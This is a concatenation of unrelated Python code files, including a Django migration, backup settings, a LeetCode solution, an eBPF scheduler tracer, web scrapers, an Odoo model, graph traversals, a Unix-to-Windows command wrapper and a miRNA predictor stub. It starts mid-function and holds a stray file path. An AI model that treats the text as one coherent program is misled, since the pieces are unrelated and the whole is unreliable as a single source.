                     {"id": "env", "type": "input", "value": data.get("Environment")},
                     {"id": "code", "type": "input", "value": data.get("code")},
                     {"id": "all_specs", "type": "input", "value": data.get("resourceName")},
                     {"id": "old_all_specs", "type": "input", "value": data.get("old_resource_name")},
                     {"id": "apply_reason", "type": "textarea", "value": value},
                     {"id": "old_apply_reason", "type": "textarea", "value": old_value}]
        return form_data
|
# Generated by Django 3.1.3 on 2021-01-12 07:24
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema change: make Programme.bullets nullable while
    # keeping the literal string 'null' as its default value.
    # NOTE(review): default='null' (the string) looks suspicious next to
    # null=True — confirm the string default is intentional.

    dependencies = [
        ('programmes', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='programme',
            name='bullets',
            field=models.TextField(default='null', null=True),
        ),
    ]
|
"""
Default Backup Settings
"""
### INCLUDES ###
import os
import string

from py_knife.ordered_dict import OrderedDict

### CONSTANTS ###
## Default Backup Settings ##
# TODO: Add 'MUTLIPLE_TAPE_SYSTEM' to parser
# NOTE(review): 'crone_schedule' and 'MUTLIPLE_TAPE_SYSTEM' are misspelled
# (cron / MULTIPLE) but are kept as-is because external code reads these names.
DEFAULT_SETTINGS = OrderedDict()
DEFAULT_SETTINGS['crone_schedule'] = '0 22 * * 1-5'  # weekdays at 22:00
DEFAULT_SETTINGS['vmrun_path'] = 'vmrun'
DEFAULT_SETTINGS['vms_path'] = os.path.join(os.path.expanduser('~'), 'vmware')

if os.name == 'nt':
    # Guessing backup media: pick the highest-lettered drive present.
    available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]
    if available_drives:
        DEFAULT_SETTINGS['tape_path'] = os.path.abspath(available_drives[-1])
    else:
        # No drive detected: fall back to the current directory rather than
        # crashing with IndexError at import time (original behavior).
        DEFAULT_SETTINGS['tape_path'] = os.path.abspath(os.curdir)
    MUTLIPLE_TAPE_SYSTEM = False
else:
    # FIXME: Would this work on MAC?
    DEFAULT_SETTINGS['tape_path'] = os.path.join(os.path.abspath(os.sep), 'media', 'lto6')
    MUTLIPLE_TAPE_SYSTEM = True

DEFAULT_SETTINGS['_backup_ts'] = ''
# Time Stamp Option 1: Allow user to change time stamps (Comment those out for Option 2)
DEFAULT_SETTINGS['folder_ts_format'] = '-%Y%m%d'
DEFAULT_SETTINGS['log_ts_format'] = '%Y-%m-%d %H:%M:%S'
# Time Stamp Option 2: Do not allow user to change time stamps
FOLDER_TS_FORMAT = '-%Y%m%d'
LOG_TS_FORMAT = '%Y-%m-%d %H:%M:%S'
|
#
# @lc app=leetcode.cn id=383 lang=python3
#
# [383] ่ต้ไฟก
#
# @lc code=start
class Solution:
    def canConstruct(self, ransomNote: str, magazine: str) -> bool:
        """Return True if ransomNote can be assembled from magazine's letters.

        Each magazine character may be used at most once.  Counting with
        collections.Counter is O(m + n) and — unlike the original re.subn
        approach — is safe even when a character is a regex metacharacter.
        """
        from collections import Counter
        # Counter subtraction keeps only positive deficits; an empty result
        # means every needed character is available in sufficient quantity.
        return not (Counter(ransomNote) - Counter(magazine))
# @lc code=end
|
#!/usr/bin/python
# Trace time spent inside the scheduler's pick_next_task_fair() per
# (cpu, pid, tgid) using eBPF kprobes, and print accumulated nanoseconds
# once per second.  Requires root and the bcc toolchain.
from __future__ import print_function
from bcc import BPF
from time import sleep, strftime
# Embedded C program compiled by bcc at runtime: pick_start records an entry
# timestamp keyed by (cpu, pid, tgid); pick_end computes the delta on return
# and accumulates it into the 'dist' hash.
bpf_text = """
#include <uapi/linux/ptrace.h>
struct key_t {
u32 cpu;
u32 pid;
u32 tgid;
};
BPF_HASH(start, struct key_t);
BPF_HASH(dist, struct key_t);
int pick_start(struct pt_regs *ctx)
{
u64 ts = bpf_ktime_get_ns();
u64 pid_tgid = bpf_get_current_pid_tgid();
struct key_t key;
key.cpu = bpf_get_smp_processor_id();
key.pid = pid_tgid;
key.tgid = pid_tgid >> 32;
start.update(&key, &ts);
return 0;
}
int pick_end(struct pt_regs *ctx)
{
u64 ts = bpf_ktime_get_ns();
u64 pid_tgid = bpf_get_current_pid_tgid();
struct key_t key;
u64 *value;
u64 delta;
key.cpu = bpf_get_smp_processor_id();
key.pid = pid_tgid;
key.tgid = pid_tgid >> 32;
value = start.lookup(&key);
if (value == 0) {
return 0;
}
delta = ts - *value;
start.delete(&key);
dist.increment(key, delta);
return 0;
}
"""
b = BPF(text=bpf_text)
# Entry and return probes around the CFS task-picking function.
b.attach_kprobe(event="pick_next_task_fair", fn_name="pick_start")
b.attach_kretprobe(event="pick_next_task_fair", fn_name="pick_end")
dist = b.get_table("dist")
print("%-6s%-6s%-6s%-6s" % ("CPU", "PID", "TGID", "TIME(ns)"))
# Poll the accumulated histogram once per second until Ctrl-C.
while (1):
    try:
        sleep(1)
        for k, v in dist.items():
            print("%-6d%-6d%-6d%-6d" % (k.cpu, k.pid, k.tgid, v.value))
        dist.clear()
    except KeyboardInterrupt:
        exit()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 19 11:57:01 2015
@author: bitjoy.net
"""
from bs4 import BeautifulSoup
import urllib.request
import xml.etree.ElementTree as ET
import re
import configparser
def get_news_pool(root, start, end):
    """Collect [datetime, url, title] triples from paginated news-list pages.

    Pages are visited from *start* down to *end* (exclusive): the first page is
    ``root + '.shtml'`` and subsequent ones ``root + '_<i>.shtml'``.  Pages
    that fail to download are skipped with a diagnostic message.
    """
    news_pool = []
    for page_no in range(start, end, -1):
        if page_no != start:
            page_url = root + '_%d.shtml' % (page_no)
        else:
            page_url = root + '.shtml'
        try:
            response = urllib.request.urlopen(page_url)
        except Exception as e:
            print("-----%s: %s-----" % (type(e), page_url))
            continue
        html = response.read()
        soup = BeautifulSoup(html, "lxml")  # http://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/
        td = soup.find('td', class_="newsblue1")
        a = td.find_all('a')
        span = td.find_all('span')
        # Fix: the original inner loop reused the outer loop variable `i`,
        # shadowing the page counter; use a distinct index name instead.
        for idx in range(len(a)):
            date_time = span[idx].string
            url = a[idx].get('href')
            title = a[idx].string
            # Year is hard-coded: the site only shows month/day in the span.
            news_info = ['2016-' + date_time[1:3] + '-' + date_time[4:-1] + ':00', url, title]
            news_pool.append(news_info)
    return (news_pool)
def crawl_news(news_pool, min_body_len, doc_dir_path, doc_encoding):
    """Download each news item, extract its body and write one XML doc per item.

    Items whose page cannot be fetched/parsed or whose body is shorter than
    *min_body_len* are skipped; surviving items are numbered sequentially.
    """
    doc_id = 1
    for news in news_pool:
        # Fetch the article page; skip it on any network error.
        try:
            response = urllib.request.urlopen(news[1])
        except Exception as e:
            print("-----%s: %s-----" % (type(e), news[1]))
            continue
        soup = BeautifulSoup(response.read(), "lxml")  # http://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/
        # Skip pages whose layout does not match the expected text container.
        try:
            body = soup.find('div', class_="text clear").find('div').get_text()
        except Exception as e:
            print("-----%s: %s-----" % (type(e), news[1]))
            continue
        # Trim everything from the first '//' marker and strip spaces.
        if '//' in body:
            body = body[:body.index('//')]
        body = body.replace(" ", "")
        if len(body) <= min_body_len:
            continue
        doc = ET.Element("doc")
        for tag, text in (("id", "%d" % (doc_id)),
                          ("url", news[1]),
                          ("title", news[2]),
                          ("datetime", news[0]),
                          ("body", body)):
            ET.SubElement(doc, tag).text = text
        ET.ElementTree(doc).write(doc_dir_path + "%d.xml" % (doc_id),
                                  encoding=doc_encoding, xml_declaration=True)
        doc_id += 1
if __name__ == '__main__':
    # Scrape the NJUPT graduate-school tutor list and emit one XML doc per tutor.
    #baseurl='http://pg.njupt.edu.cn/2018/0903/c1079a132310/page.htm'  # 46 doctoral supervisors
    baseurl='http://pg.njupt.edu.cn/2018/0903/c1080a132292/page.htm' # 93 master's supervisors
    tutors_pool=[]
    response = urllib.request.urlopen(baseurl)
    html = response.read()
    soup = BeautifulSoup(html, "lxml")
    body=soup.find('div',class_="wp_articlecontent")
    a=body.find_all('a')
    span=body.find_all('span')
    # Pair each anchor (tutor detail link) with the tutor's name.
    for i in range(len(a)):
        title = span[i].string
        url = a[i].get('href')
        name = a[i].string
        tutor_info = [name, url]
        tutors_pool.append(tutor_info)
    i = 1
    for tutor in tutors_pool:
        response = urllib.request.urlopen(tutor[1])
        html = response.read()
        soup = BeautifulSoup(html, "lxml")
        # NOTE(review): absolute CSS paths into a legacy table layout —
        # extremely brittle; breaks if the site template changes.
        title=soup.select('#container_content > table > tbody > tr:nth-of-type(2) > td > table > tbody > tr:nth-of-type(3) > td > table > tbody > tr > td > table > tbody > tr > td:nth-of-type(2) > table > tbody > tr:nth-of-type(7) > td:nth-of-type(2)')
        body1=soup.select('#container_content > table > tbody > tr:nth-of-type(2) > td > table > tbody > tr:nth-of-type(3) > td > table > tbody > tr > td > p:nth-of-type(4)')
        body2=soup.select('#container_content > table > tbody > tr:nth-of-type(2) > td > table > tbody > tr:nth-of-type(3) > td > table > tbody > tr > td > p:nth-of-type(6)')
        title1=title[0].get_text()
        title2=title[0].get('align')
        doc_dir_path ='../data/news/'
        doc_encoding = 'utf-8'
        doc = ET.Element("doc")
        ET.SubElement(doc, "id").text = "%d" % (i)
        ET.SubElement(doc, "url").text = tutor[1]
        ET.SubElement(doc, "title").text = tutor[0]
        ET.SubElement(doc, "datetime").text = '2018-09-12'
        # ET.SubElement(doc, "title1").text = title[0].get_text()
        ET.SubElement(doc, "body").text = body1[0].get_text()
        # ET.SubElement(doc, "body2").text = body2[0].get_text()
        tree = ET.ElementTree(doc)
        tree.write(doc_dir_path + "%d.xml" % (i), encoding=doc_encoding, xml_declaration=True)
        i += 1
    print('done!')
|
/Users/Di/anaconda/lib/python2.7/sre_parse.py |
from Bio import Entrez

# Parse a PubMed XML export and print each article title.
# Fix: the original opened the file and never closed it; a context manager
# guarantees the handle is released even if parsing fails.
with open('pubmed_result_tighe.xml') as handle:
    for record in Entrez.parse(handle):
        print(record['MedlineCitation']['Article']['ArticleTitle'])
|
import re
import json
import sys
import os
from datetime import date
from datetime import datetime
#========= external package==========
from bs4 import BeautifulSoup
import requests
import pandas as pd
from utils import retrieve_symb_list
from utils import make_folder
def replacebill(testo):
    """Normalize a human-readable market-cap string to billions (float).

    Suffix semantics: 't' (trillions) -> *1000, 'b' (billions) -> as-is,
    'm' (millions) -> /1000, 'k' (thousands) -> /1e6.  When no number is
    present the input is returned unchanged.
    """
    # Accept both "12.5b" and "12b"; the original pattern \d+\.\d+ raised
    # IndexError on integer-valued strings such as "5m".
    match = re.search(r"\d+(?:\.\d+)?", testo)
    if match is None:
        return testo
    number = float(match.group(0))
    outfloat = testo
    # Independent checks, later matches override earlier ones — mirrors the
    # original cascade exactly for strings containing multiple suffix letters.
    if 't' in testo:
        outfloat = number * 1000
    if 'b' in testo:
        outfloat = number
    if 'm' in testo:
        outfloat = number / 1000
    if 'k' in testo:
        outfloat = number / 1000000
    return outfloat
def stock_twits(tick, jsondataprint = False, fulllist = False):
    '''
    Scrape stocktwits.com for one ticker and return fundamentals/sentiment.

    :param tick: stock ticker symbol, e.g. 'AAPL'
    :param jsondataprint: when True, dump the raw JSON payload and the
        final field list (debug mode)
    :param fulllist: when True, extend the output with the full set of
        fundamental fields
    :return: (list of values, list of matching column names)
    '''
    url = 'https://stocktwits.com/symbol/' + tick
    page = requests.get(url)
    soup = BeautifulSoup(page.content, 'html.parser')
    # ==================================================================
    # Market cap is read from a class-hashed span; index 5 is brittle and
    # any scrape failure silently falls back to 0.
    try:
        foundam_list = [i.text for i in soup.select(".st_2LcBLI2")]
        _Mkt_Cap = foundam_list[5]
        _Mkt_Cap = replacebill(_Mkt_Cap)
    except:
        _Mkt_Cap = 0
    # ==================================================================
    # The page embeds its data store as `window.INITIAL_STATE = {...};`
    # inside a <script> tag; extract and decode that JSON blob.
    script = soup.find_all("script")
    pattern = re.compile('window.INITIAL_STATE = {.*};')
    # initialize jsonString
    jsonString = {}
    for e in script:
        for i in e:
            strObj = str(i)
            match = pattern.search(strObj)
            if match:
                jsonString = match.group(0).split("window.INITIAL_STATE = "
                                                  )[1][:-1].encode('utf8').decode('unicode_escape')
    jsonData = json.loads(jsonString, strict=False)
    if jsondataprint == True: print(jsonData)
    # print(jsonData)
    # print(jsonData['stocks']['inventory'])
    def nested_main(jsonData, key_value):
        ''''
        Depth-first search for *key_value* anywhere in the JSON tree;
        returns the last match found, or 0 when absent/unreadable.
        '''
        list = [0]
        try:
            def nested(jsonData, key_value):
                for i in jsonData:
                    if i == key_value:
                        list.append(jsonData[i])
                    elif key_value in str(jsonData[i]):
                        nested(jsonData[i], key_value)
            nested(jsonData, key_value)
            returnval = list[-1]
        except:
            returnval = 0
        return returnval
    _sentimentChange = nested_main(jsonData, "sentimentChange")
    _volumechange = nested_main(jsonData, "volumeChange")
    _industry = nested_main(jsonData, "industry")
    _datetime = nested_main(jsonData, "dateTime")
    _52wk_High = nested_main(jsonData, "highPriceLast52Weeks")
    _totalDebt = nested_main(jsonData, "totalDebt")
    _grossIncomeMargin = nested_main(jsonData, "grossIncomeMargin")
    _totalEnterpriseValue = nested_main(jsonData, "totalEnterpriseValue")
    _averageDailyVolumeLastMonth = nested_main(jsonData, "averageDailyVolumeLastMonth")
    _dividendPayoutRatio = nested_main(jsonData, "dividendPayoutRatio")
    _sharesHeldByInstitutions = nested_main(jsonData, "sharesHeldByInstitutions")
    _numberOfEmployees = nested_main(jsonData, "numberOfEmployees")
    _dividendExDate = nested_main(jsonData, "dividendExDate")
    _earningsGrowth = nested_main(jsonData, "earningsGrowth")
    _extendedHoursPercentChange = nested_main(jsonData, "extendedHoursPercentChange")
    _averageDailyVolumeLast3Months = nested_main(jsonData, "averageDailyVolumeLast3Months")
    _previousClose = nested_main(jsonData, "previousClose")
    _previousCloseDate = nested_main(jsonData, "previousCloseDate")
    _averageDailyVolumeLast3Months = nested_main(jsonData, "averageDailyVolumeLast3Months")
    _bookValuePerShare = nested_main(jsonData, "bookValuePerShare")
    _priceToBook = nested_main(jsonData, "priceToBook")
    _totalLiabilities = nested_main(jsonData, "totalLiabilities")
    _50DayMovingAverage = nested_main(jsonData, "50DayMovingAverage")
    _pegratio = nested_main(jsonData, "pegRatio")
    _dividendYieldSecurity = nested_main(jsonData, "dividendYieldSecurity")
    _open = nested_main(jsonData, "open")
    _peratio = nested_main(jsonData, "peRatio")
    list_out = [_datetime, _industry, _volumechange, _sentimentChange, _52wk_High, _Mkt_Cap,
                _peratio, _pegratio, _previousCloseDate]
    # NOTE(review): this coercion loop is duplicated (and superseded) by the
    # more complete one further down — looks like dead code left behind.
    for i,e in enumerate(list_out):
        try:
            list_out[i] = float(e)
        except:
            try:
                list_out[i] = datetime.strptime(e, '%Y-%m-%d %H:%M:%S')
            except:
                try:
                    list_out[i] = datetime.strptime(e, '%Y-%m-%d')
                except:
                    pass
    columnsame = ['_datetime', '_industry', '_volumechange', '_sentimentChange', '_52wk_High', '_Mkt_Cap',
                  '_peratio', '_pegratio', '_previousCloseDate']
    if fulllist == True:
        # NOTE(review): several fields appear twice in both lists
        # (_50DayMovingAverage, _totalLiabilities, _averageDailyVolumeLast3Months).
        list_out.extend([_dividendYieldSecurity, _50DayMovingAverage, _totalLiabilities,
                         _50DayMovingAverage, _totalLiabilities, _priceToBook, _bookValuePerShare,
                         _averageDailyVolumeLast3Months, _averageDailyVolumeLast3Months, _earningsGrowth,
                         _dividendExDate, _numberOfEmployees, _sharesHeldByInstitutions, _dividendPayoutRatio,
                         _averageDailyVolumeLastMonth, _totalEnterpriseValue, _totalDebt])
        columnsame.extend(['_dividendYieldSecurity', '_50DayMovingAverage', '_totalLiabilities',
                           '_50DayMovingAverage', '_totalLiabilities', '_priceToBook', '_bookValuePerShare',
                           '_averageDailyVolumeLast3Months', '_averageDailyVolumeLast3Months', '_earningsGrowth',
                           '_dividendExDate', '_numberOfEmployees', '_sharesHeldByInstitutions', '_dividendPayoutRatio',
                           '_averageDailyVolumeLastMonth', '_totalEnterpriseValue', '_totalDebt'])
    else:
        pass
    # Coerce each field to float or datetime where possible (best effort).
    for i,e in enumerate(list_out):
        try:
            list_out[i] = float(e)
        except:
            try:
                list_out[i] = datetime.strptime(e, '%Y-%m-%d %H:%M:%S')
            except:
                try:
                    list_out[i] = datetime.strptime(e, '%d/%m/%Y %H:%M:%S')
                except:
                    try:
                        list_out[i] = datetime.strptime(e, '%Y-%m-%d')
                    except:
                        pass
    # run when in debugging mode
    if jsondataprint == True:
        for i,e in enumerate(list_out):
            print('\n',columnsame[i],' ',list_out[i], type(list_out[i]))
    else:
        pass
    return list_out, columnsame
def stock_twits_create_df(stock, jsondataprint=False, fulllist = False):
    """Scrape stocktwits for *stock* and wrap the result in a one-row DataFrame."""
    values, columns = stock_twits(stock, jsondataprint=jsondataprint, fulllist=fulllist)
    return pd.DataFrame([values], columns=columns, index=[stock])
def export_hdf_stocktwits(symb):
    '''
    Persist every ticker in *symb* into a single HDF5 store (df-st.h5),
    one key per ticker; failures are logged and skipped.
    :param symb: list of ticker symbols
    :return: nothing
    '''
    for ticker in symb:
        try:
            frame = stock_twits_create_df(ticker).reset_index()
            frame.to_hdf('./DB-COM/df-st.h5', key=ticker, mode='a')
        except Exception as e:
            exc_type, exc_obj, exc_tb = sys.exc_info()
            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
            print(ticker, "Failed to store stocktwits hdf5: ", e, exc_type, fname, exc_tb.tb_lineno)
def export_csv_stocktwits(symb, fulllist = False):
    '''
    Scrape every ticker in *symb* (one row each), concatenate the rows and
    dump them to a dated CSV under ./DB-COM/; failures are logged and skipped.
    :param symb: list of ticker symbols
    :return: a dataframe with the latest stocktwits rows
    '''
    combined = pd.DataFrame({})
    for ticker in symb:
        try:
            row = stock_twits_create_df(ticker, fulllist = fulllist)
            # First successful row seeds the frame; later rows are appended.
            if combined.shape[1] < 1:
                combined = row
            else:
                combined = pd.concat([combined, row])
        except Exception as e:
            exc_type, exc_obj, exc_tb = sys.exc_info()
            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
            print(ticker, "Failed to store stocktwits csv : ", e, exc_type, fname, exc_tb.tb_lineno)
    combined.to_csv('./DB-COM/' + str(date.today()) + 'stock_twits.csv')
    return combined
def test_stocktwits():
    '''
    Smoke-test the scraper: print the full AAPL row in debug mode.
    '''
    frame = stock_twits_create_df('AAPL', jsondataprint = True, fulllist = True)
    print(frame)
def run_backup():
    """Refresh the CSV export for every symbol in the configured watch list."""
    symb = retrieve_symb_list()
    export_csv_stocktwits(symb, fulllist = True)


if __name__ == '__main__':
    # Fix: the backup previously ran unconditionally at import time, turning
    # every `import` of this module into a full network scrape.
    run_backup()
from openerp.osv import fields, osv
from openerp import api
class invoice_csnumber(osv.osv):
    """Extend analytic accounts with read-only partner banking fields.

    All columns are `related` proxies onto the linked partner record, so
    they always mirror partner data and are never stored independently.
    """
    _inherit = 'account.analytic.account'
    _columns = {
        'cs_number': fields.related('partner_id', 'cs_number', type='char', size=12, string='CS Number', readonly=True),
        'branch_code': fields.related('partner_id','branch_code',type='char',string='Branch Code',readonly=True),
        'bank_code': fields.related('partner_id','bank_code',type='char',string='Bank Code',readonly=True),
        'address': fields.related('partner_id','street',type='char',string='Address',readonly=True),
        'city': fields.related('partner_id','city',type='char',string='City',readonly=True),
    }
|
import time
"""
Simple graph implementation
"""
from util import Stack, Queue # These may come in handy
class Graph:
    """Represent a directed graph as a dict mapping vertex labels to edge sets."""

    def __init__(self, vertices=None):
        """Create a graph, optionally seeded with an existing vertex dict.

        Fix: the original signature was ``def __init__(self, vertices={})`` —
        a mutable default argument, so every ``Graph()`` instance shared the
        same vertex dictionary.  Each instance now gets its own dict.
        """
        self.vertices = {} if vertices is None else vertices

    def add_vertex(self, vertex_id):
        """Add a vertex to the graph (resets its edge set if it exists)."""
        self.vertices[vertex_id] = set()

    def add_edge(self, v1, v2):
        """Add a directed edge v1 -> v2; both endpoints must already exist."""
        try:
            if self.vertices[v1] or self.vertices[v2]:
                # Touch both entries so a missing vertex raises before we mutate.
                pass
            self.vertices[v1].add(v2)
        except KeyError:
            print('one of the vertexes does not exist')
            # TODO Make it print the exact vertex that doesn't exist

    def get_neighbors(self, vertex_id):
        """Get all neighbors (edges) of a vertex."""
        return self.vertices[vertex_id]

    def bft(self, starting_vertex):
        """Print and return each vertex in breadth-first order from starting_vertex."""
        q = [starting_vertex]
        seen = [starting_vertex]
        while len(q) >= 1:
            for neighbor in self.get_neighbors(q[0]):
                if neighbor not in seen:
                    q.append(neighbor)
                    seen.append(neighbor)
            # NOTE: pop(0)/del from the front is O(n); a collections.deque
            # would scale better, kept as-is for behavioral parity.
            del q[0]
        print(seen)
        return seen

    def dft(self, starting_vertex):
        """Print and return each vertex in depth-first order from starting_vertex."""
        stack = [starting_vertex]
        seen = [starting_vertex]
        output = []
        while len(stack) > 0:
            current = stack.pop()
            output.append(current)
            for neighbor in self.get_neighbors(current):
                if neighbor not in seen:
                    stack.append(neighbor)
                    seen.append(neighbor)
        print(output)
        return output

    def dft_recursive(self, starting_vertex, seen=None):
        """Depth-first traversal using recursion.

        Returns a (seen, order) pair: the set of visited vertices and a list
        giving one valid DFT order starting at starting_vertex.
        """
        if seen is None:  # first call?
            seen = set()
        neighbors = self.get_neighbors(starting_vertex)
        # Base case: no neighbor is new (or there are none) — this vertex
        # terminates the branch.
        if all(nbr in seen for nbr in neighbors):
            return seen, [starting_vertex]
        order = [starting_vertex]
        seen.add(starting_vertex)
        for nbr in neighbors:
            if nbr not in seen:
                seen.add(nbr)
                sub_seen, sub_order = self.dft_recursive(nbr, seen)
                # `seen` is mutated in place by the recursive call, so the
                # returned sub_seen is the same object.
                order.extend(sub_order)
        print(seen, order)
        return seen, order

    def bfs(self, starting_vertex, destination_vertex):
        """Return the shortest path from starting_vertex to destination_vertex
        (breadth-first), reconstructed by walking parent links backwards.

        NOTE(review): raises KeyError during back-tracking when the
        destination is unreachable — confirm callers only query connected pairs.
        """
        dv = destination_vertex
        q = list(self.get_neighbors(starting_vertex))
        parents = {}
        for vertex in q:
            parents[vertex] = starting_vertex
        while len(q) > 0:
            current = q.pop(0)
            for child in self.get_neighbors(current):
                if child == dv:
                    parents[child] = current
                    q = []
                    break
                try:
                    # Already has a parent -> already enqueued.
                    # NOTE(review): truthiness test means a falsy parent
                    # label (e.g. 0) would be re-enqueued — confirm labels
                    # are always truthy.
                    if parents[child]:
                        continue
                except KeyError:
                    parents[child] = current
                    q.append(child)
        # Walk parent links back from the destination to build the path.
        sequence = [dv]
        current = dv
        while current != starting_vertex:
            current = parents[current]
            sequence.append(current)
        sequence.reverse()
        return sequence

    def dfs(self, starting_vertex, destination_vertex):
        """Return a path from starting_vertex to destination_vertex found
        depth-first (LIFO frontier); same parent-link reconstruction as bfs.
        """
        dv = destination_vertex
        q = list(self.get_neighbors(starting_vertex))
        parents = {}
        for vertex in q:
            parents[vertex] = starting_vertex
        while len(q) > 0:
            current = q.pop()  # pop from the end -> depth-first
            for child in self.get_neighbors(current):
                if child == dv:
                    parents[child] = current
                    q = []
                    break
                try:
                    if parents[child]:
                        continue
                except KeyError:
                    parents[child] = current
                    q.append(child)
        sequence = [dv]
        current = dv
        while current != starting_vertex:
            current = parents[current]
            sequence.append(current)
        sequence.reverse()
        return sequence

    def dfs_recursive(self, starting_vertex, destination_vertex, sequence=None):
        """Return a path from starting_vertex to destination_vertex found by
        recursive depth-first search, or 0 when no path exists.
        """
        if sequence is None:
            sequence = [starting_vertex]
        if starting_vertex == destination_vertex:
            return sequence
        for nbr in self.get_neighbors(starting_vertex):
            if nbr in sequence:
                continue
            val = self.dfs_recursive(nbr, destination_vertex, sequence + [nbr])
            # 0 signals a dead end; anything else is the found path and is
            # propagated straight up out of the recursion.
            if val != 0:
                return val
        return 0
if __name__ == '__main__':
    # Demo/self-check: build the reference 7-vertex graph and exercise every
    # traversal, comparing printed output against the listed valid orders.
    graph = Graph()  # Instantiate your graph
    # https://github.com/LambdaSchool/Graphs/blob/master/objectives/breadth-first-search/img/bfs-visit-order.png
    graph.add_vertex(1)
    graph.add_vertex(2)
    graph.add_vertex(3)
    graph.add_vertex(4)
    graph.add_vertex(5)
    graph.add_vertex(6)
    graph.add_vertex(7)
    graph.add_edge(5, 3)
    graph.add_edge(6, 3)
    graph.add_edge(7, 1)
    graph.add_edge(4, 7)
    graph.add_edge(1, 2)
    graph.add_edge(7, 6)
    graph.add_edge(2, 4)
    graph.add_edge(3, 5)
    graph.add_edge(2, 3)
    graph.add_edge(4, 6)
    '''
    Should print:
    {1: {2}, 2: {3, 4}, 3: {5}, 4: {6, 7}, 5: {3}, 6: {3}, 7: {1, 6}}
    '''
    print(graph.vertices)
    '''
    Valid BFT paths:
    1, 2, 3, 4, 5, 6, 7
    1, 2, 3, 4, 5, 7, 6
    1, 2, 3, 4, 6, 7, 5
    1, 2, 3, 4, 6, 5, 7
    1, 2, 3, 4, 7, 6, 5
    1, 2, 3, 4, 7, 5, 6
    1, 2, 4, 3, 5, 6, 7
    1, 2, 4, 3, 5, 7, 6
    1, 2, 4, 3, 6, 7, 5
    1, 2, 4, 3, 6, 5, 7
    1, 2, 4, 3, 7, 6, 5
    1, 2, 4, 3, 7, 5, 6
    '''
    graph.bft(1)
    '''
    Valid DFT paths:
    1, 2, 3, 5, 4, 6, 7
    1, 2, 3, 5, 4, 7, 6
    1, 2, 4, 7, 6, 3, 5
    1, 2, 4, 6, 3, 5, 7
    '''
    graph.dft(1)
    seen,stack = graph.dft_recursive(1)
    print(stack)
    '''
    Valid BFS path:
    [1, 2, 4, 6]
    '''
    print(graph.bfs(1, 6))
    '''
    Valid DFS paths:
    [1, 2, 4, 6]
    [1, 2, 4, 7, 6]
    '''
    print(graph.dfs(1, 6))
    print('DFS recursive:',graph.dfs_recursive(1, 6))
    print(list(graph.get_neighbors(1)))
|
import os
import subprocess
class UnixCmd(object):
    """Map familiar Unix command names onto their Windows cmd.exe equivalents.

    Each ``__xx__`` method shells out through redirect_stdout, which pages
    output 32 lines at a time.
    """

    def __cd__(self, path):
        self.redirect_stdout('cd', path)

    def __ls__(self):
        self.redirect_stdout('dir', os.getcwd())

    def __cat__(self, fname):
        self.redirect_stdout('type', fname)

    def __cp__(self, fname, path):
        self.redirect_stdout('copy', fname, path)

    def __mv__(self, org_name, new_name):
        self.redirect_stdout('ren', org_name, new_name)

    def __rm__(self, fname):
        self.redirect_stdout('del', fname)

    def __more__(self, fname):
        self.redirect_stdout('more', fname)

    @staticmethod
    def redirect_stdout(cmd, *path):
        """Run *cmd* with its arguments and page the output.

        Fix: the argument vector was built as ``[cmd, path]``, nesting the
        whole *path* tuple as a single element, which raises TypeError inside
        Popen's command-line assembly; unpack the tuple instead.
        """
        line = 0
        fp = subprocess.Popen([cmd, *path], stdout=subprocess.PIPE,
                              stderr=subprocess.STDOUT, shell=True)
        for eachline in fp.stdout:
            line += 1
            print(eachline)
            print(str(eachline).strip('\r\n'))
            # Pause every 32 lines, like `more`.
            if line >= 32:
                input('-more-')
def shell():
    """Tiny interactive REPL dispatching Unix-style command names to UnixCmd."""
    cmd = UnixCmd()
    sh_cmd = {'cd': cmd.__cd__, 'ls': cmd.__ls__, 'cat': cmd.__cat__,
              'cp': cmd.__cp__, 'mv': cmd.__mv__, 'rm': cmd.__rm__,
              'more': cmd.__more__}
    while True:
        msg = input('[%s:]$' % os.name).strip()
        sh = msg.split(' ')
        # Fix: 'exit' was only checked after the valid-command gate below,
        # which rejected it as "Invalid command." first — the loop could
        # never terminate.  Check it before validating.
        if sh[0] == 'exit':
            break
        if sh[0] not in sh_cmd.keys():
            print('Invalid command.')
            continue
        if msg == 'ls':
            sh_cmd[msg]()
            continue
        # Pad missing arguments with '' so dispatch never IndexErrors.
        if len(sh) < 2:
            sh.append('')
        if sh[0] in ['cd', 'cat', 'rm', 'more']:
            sh_cmd[sh[0]](sh[1])
            continue
        if len(sh) < 3:
            sh.append('')
        if sh[0] in ['mv', 'cp']:
            sh_cmd[sh[0]](sh[1], sh[2])


if __name__ == '__main__':
    # Only start the interactive loop when run as a script, not on import.
    shell()
import DocumentProcessorBuilder
def parseCMDArgs(listOfCMDArgs):
    """Translate argv-style command words into a configured builder plus file args.

    Expects at least 3 argv entries; a 6th entry is treated as a secondary
    command (e.g. a piped 'wc').
    """

    def parse_commands(args):
        secondary = None
        if len(args) > 5:
            secondary = args[5]
        elif len(args) < 3:
            raise RuntimeError("too few arguments")

        def build(primary, secondary):
            # Assemble the processing pipeline for the requested command(s).
            builder = DocumentProcessorBuilder.DocumentProcessorBuilder()
            if primary == "grep":
                builder.set_line_filterer()
            if primary == "wc" or secondary == "wc":
                builder.set_case_converter()
                builder.set_word_finder()
                builder.set_non_abc_filterer()
                builder.set_word_counter()
            return builder

        return build(args[1], secondary)

    def parse_arguments(args, dpb):
        # grep mode shifts the file name one slot right, with the search
        # words occupying argv[2].
        if hasattr(dpb, 'line_filterer'):
            return {'file_name': args[3],
                    'words_to_search_for': args[2],
                    'dpb': dpb}
        return {'file_name': args[2], 'dpb': dpb}

    return parse_arguments(listOfCMDArgs, parse_commands(listOfCMDArgs))
|
#Predicts likehood of someone having kidney disease based on their mirna
#Predition is based of comparsion of known mirna samples of people diagnosed with kidney disease
import numpy as np
import glob
from collections import OrderedDict
import parser
# Standardised reference data produced by the companion `parser` module:
# allMaxesPruned maps miRNA name -> aggregate count over the diseased cohort,
# peopleCounter is the cohort size.
allMaxesPruned = parser.allMaxesPruned
maxPeople = parser.peopleCounter
maxScore = 0              # best attainable similarity score; set by main()
topmiRNAHits = 50         # how many top miRNAs to consider per patient
patientMax = {}           # per-patient miRNA -> likelihood; rebuilt per file
